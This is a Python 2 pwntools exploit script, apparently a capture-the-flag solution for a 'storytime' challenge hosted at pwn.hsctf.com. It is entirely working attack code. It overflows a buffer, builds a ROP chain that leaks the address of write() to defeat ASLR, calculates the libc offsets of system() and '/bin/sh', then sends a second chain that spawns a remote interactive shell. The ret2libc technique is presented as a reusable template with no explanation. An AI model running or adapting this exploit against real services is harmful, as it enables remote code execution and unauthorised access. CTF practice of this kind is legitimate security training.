#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from struct import pack
from struct import unpack

#context.log_level='debug'

### STAGE 1: find address of write() ###

off_wr = 0xf72b0
off_sys= 0x45390
off_bin= 0x18cd57
off_exit=0x03a030
pad = "A"*56

p = ''
p += pack("Q", 0x400703) #pop rdi; ret;
p += pack("Q", 0x1)		 #rdi = 0x0
p += pack("Q", 0x400701) #pop rsi; pop r15; ret
p += pack("Q", 0x601018) #write@plt
p += pack("Q", 0x0)		 #r15 = 0x0
p += pack("Q", 0x4004a0) #jmp _write()
p += pack("Q", 0x4004d0) #_start()

payload = pad + p
#print payload
#s = process('./storytime')
s = remote('pwn.hsctf.com', 3333)
print s.recvuntil('Tell me a story: \n')
s.send(payload)
result = s.recv()
result = result[0:8]
wr = unpack("Q", (result + "\x00"*8)[0:8])[0] #address of write()
print "_write()'s address: %s" % hex(wr)


### STAGE 2: system("/bin/sh")

sys   = wr + (off_sys - off_wr)
binsh = wr + (off_bin - off_wr)
exit  = wr + (off_exit- off_wr)
p = ''
p += pack("Q", 0x400703) #pop rdi; ret
p += pack("Q", binsh)	#"/bin/sh"
p += pack("Q", sys)		#system()
p += pack("Q", exit)	#exit()
payload = pad + p
print s.recvuntil('a story: \n')
s.send(payload)
s.interactive()

s.close()
